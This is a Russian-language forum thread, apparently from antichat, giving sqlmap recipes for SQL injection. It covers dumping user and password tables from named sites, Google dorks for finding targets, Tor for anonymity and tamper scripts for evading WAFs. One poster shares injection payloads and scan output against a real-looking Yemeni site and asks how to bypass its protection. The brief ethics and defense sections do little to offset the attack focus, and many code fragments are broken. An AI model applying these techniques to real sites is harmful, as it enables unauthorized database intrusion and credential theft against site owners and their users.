![]() |
Здравствуйте, небольшой мануал по поиску SQLi в примерах The SQL Injection Knowledge Base
|
Печально когда доходишь до паролей а там AES
|
И oпять вызываем уже знакомую процедуру --columns (колоночки) но уже по таблице "user_".
Код: Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T user_info --columns |
https://forum.antichat.xyz/attachmen...8498912726.png
И что дальше делать?как увидеть логин и пароль? Яполный ламер,не судите строго. |
Цитата:
или ещё проще, без названия колонки, вытащит сразу все данные изо всех колонок (применять, если данных мало) sqlmap --random-agent -u http:/site.php?id=1 -D название базы -T название таблицы --dump |
Цитата:
|
Неплохо бы еще добавлять параметры --tor и --check-tor (добавит немножко анонимности в пентест)
|
Можно ли эти знания применять определенно на 1 сайт или только, те которые имеют подобный дорк ?
|
самое главное не сказали, а где скачать этот sqlmap
|
Цитата:
|
https://forum.antichat.xyz/attachmen...1313927036.png
От основ до обхода WAF и защиты. Актуальный гайд на 2025 год. Sqlmap — это не просто инструмент. Это швейцарский нож пентестера, который превращает рутинный поиск SQL-инъекций в автоматизированный процесс, вплоть до полного захвата сервера. Старые гайды по нему хороши, но мир не стоит на месте: везде стоят WAF, технологии меняются. Поэтому мы собрали здесь всё воедино: классическую базу, современные техники обхода и актуальные советы по защите. Всё в стиле античат — по делу и без воды. Что умеет sqlmap? Ключевые возможности в 2025 году Если коротко — sqlmap делает почти всё. Он сам определяет тип уязвимости, подбирает нужный эксплойт и вытаскивает данные. Вот его основной арсенал, актуальный для последних версий:
Sqlmap не просто бездумно шлет запросы. Он действует последовательно, перебирая техники от самых шумных и быстрых к самым медленным и незаметным.
Сегодня почти любой серьезный проект защищен Web Application Firewall (WAF). Прямые атаки sqlmap он легко отобьет. Но и на этот случай у нас есть решение — tamper-скрипты. Это небольшие скрипты, которые на лету изменяют ваши запросы, чтобы обмануть файрвол. Они умеют:
Bash: Код:
sqlmap -u
Код:
--levelКод:
--risk
Код:
risk=3Закон и этика: это не игрушки Запомните раз и навсегда: Код:
sqlmapПоследствия могут быть серьезными:
Как начать: пошаговый план Прежде чем мы перейдем к конкретным командам, полезно понимать, как этот инструмент вписывается в общую картину. Если вы хотите лучше разобраться в том, что такое пентест и чем он отличается от работы Red Team, на форуме есть отличный обзорный материал: Всё о Пентесте и Red Team для новичков в новых реалиях. Шаг 1: Поиск цели (для учебных целей!) Классические Google Dorks всё ещё работают, но в основном на старых сайтах или в рамках CTF: Код: Код:
inurl:.php?id=Шаг 2: Быстрая ручная проверка Простейший тест — добавить кавычку ( Код:
'Код:
http://test-site.com/product.php?id=123'Шаг 3: Эксплуатация с помощью sqlmap
В 99% случаев интересные уязвимости находятся за формой входа. Чтобы Код:
sqlmap
Код:
request.txtКод:
sqlmap -r request.txtА что насчет API и JSON? Да, Код:
sqlmapКод:
*Bash: Код:
sqlmap -uКод:
-pКак защититься? Советы для разработчиков Атаковать весело, но важно уметь и строить крепости. Вот главные правила защиты от SQL-инъекций:
Sqlmap — это невероятно мощный скальпель в руках специалиста. Но, как и любой инструмент, он требует понимания. Важно не просто заучить команды, а осознавать, что происходит "под капотом", помнить об ответственности и всегда думать на два шага вперед — не только как атаковать, но и как защититься. Надеюсь, это руководство поможет вам в ваших (легальных!) исследованиях. Успешного пентеста и безопасного кода! Продолжение: Гайд по SQL-инъекциям: SQLMap + Hashcat Цитата:
|
Цитата:
|
Parameter: page_id (GET)
Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: page_id=-6154) OR 5450=5450 AND (8862=8862&=1 Type: UNION query Title: Generic UNION query (random number) - 8 columns Payload: page_id=-6697) UNION ALL SELECT 6812,6812,6812,6812,6812,6812,6812,'qjqxq'||'XrrFQ nvzWGtBSHNuZlXbUDgQvCKGcXoHkTZgeAfY'||'qjvkq';--&=1 --- do you want to exploit this SQL injection? [Y/n] Y [08:14:07] [INFO] testing CrateDB [08:14:08] [WARNING] the back-end DBMS is not CrateDB [08:14:08] [INFO] testing MySQL [08:14:10] [WARNING] the back-end DBMS is not MySQL [08:14:10] [INFO] testing Oracle [08:14:11] [WARNING] the back-end DBMS is not Oracle [08:14:11] [INFO] testing PostgreSQL [08:14:12] [WARNING] the back-end DBMS is not PostgreSQL [08:14:12] [INFO] testing Microsoft SQL Server [08:14:14] [WARNING] the back-end DBMS is not Microsoft SQL Server [08:14:14] [INFO] testing SQLite [08:14:15] [WARNING] the back-end DBMS is not SQLite [08:14:15] [INFO] testing Microsoft Access [08:14:16] [WARNING] the back-end DBMS is not Microsoft Access [08:14:16] [INFO] testing Firebird [08:14:17] [WARNING] the back-end DBMS is not Firebird [08:14:17] [INFO] testing SAP MaxDB [08:14:18] [WARNING] the back-end DBMS is not SAP MaxDB [08:14:18] [INFO] testing Sybase [08:14:19] [WARNING] the back-end DBMS is not Sybase [08:14:19] [INFO] testing IBM DB2 [08:14:20] [WARNING] the back-end DBMS is not IBM DB2 [08:14:20] [INFO] testing HSQLDB [08:14:21] [WARNING] the back-end DBMS is not HSQLDB [08:14:21] [INFO] testing H2 [08:14:22] [WARNING] the back-end DBMS is not H2 [08:14:22] [INFO] testing Informix [08:14:23] [WARNING] the back-end DBMS is not Informix [08:14:23] [INFO] testing MonetDB [08:14:24] [WARNING] the back-end DBMS is not MonetDB [08:14:24] [INFO] testing Apache Derby [08:14:26] [WARNING] the back-end DBMS is not Apache Derby [08:14:26] [INFO] testing Vertica [08:14:27] [WARNING] the back-end DBMS is not Vertica [08:14:27] [INFO] testing Mckoi [08:14:29] [WARNING] the back-end DBMS is not Mckoi [08:14:29] [INFO] testing Presto [08:14:30] [WARNING] the back-end DBMS is not Presto [08:14:30] [INFO] testing Altibase [08:14:31] [WARNING] the back-end DBMS is not Altibase [08:14:31] [INFO] testing MimerSQL [08:14:32] [WARNING] the back-end DBMS is not MimerSQL [08:14:32] [INFO] testing ClickHouse [08:14:32] [WARNING] the back-end DBMS is not ClickHouse [08:14:32] [INFO] testing Cubrid [08:14:33] [WARNING] the back-end DBMS is not Cubrid [08:14:33] [INFO] testing InterSystems Cache [08:14:34] [WARNING] the back-end DBMS is not InterSystems Cache [08:14:34] [INFO] testing eXtremeDB [08:14:35] [WARNING] the back-end DBMS is not eXtremeDB [08:14:35] [INFO] testing FrontBase [08:14:37] [WARNING] the back-end DBMS is not FrontBase [08:14:37] [INFO] testing Raima Database Manager [08:14:38] [WARNING] the back-end DBMS is not Raima Database Manager [08:14:38] [INFO] testing Virtuoso [08:14:39] [WARNING] the back-end DBMS is not Virtuoso [08:14:39] [ERROR] sqlmap was not able to fingerprint the back-end database management system, skipping to the next target SQL injection vulnerability has already been detected against 'alwalalyemeni.com'. Do you want to skip further tests involving it? [Y/n] Y [08:14:39] [INFO] skipping 'من نحن - alwalaly' [08:14:39] [INFO] skipping '- alwalaly' [08:14:39] [INFO] skipping 'الوزير - alwalaly' [08:14:39] [INFO] skipping 'الوعل - alwalaly' [08:14:39] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'Local\sqlmap\output\results-11052025_0906pm.csv' [*] ending @ 08:14:39 /2025-11-06/ Что мне делать дальше? Я не могу обойти защиту. |
Спасибо за гайд. Хорошее объяснение, причем на русском языке.
+ полезные ссылки по пентесту. Одним словом отличный материал для интересующихся в кибербезе людей) |
| Время: 16:02 |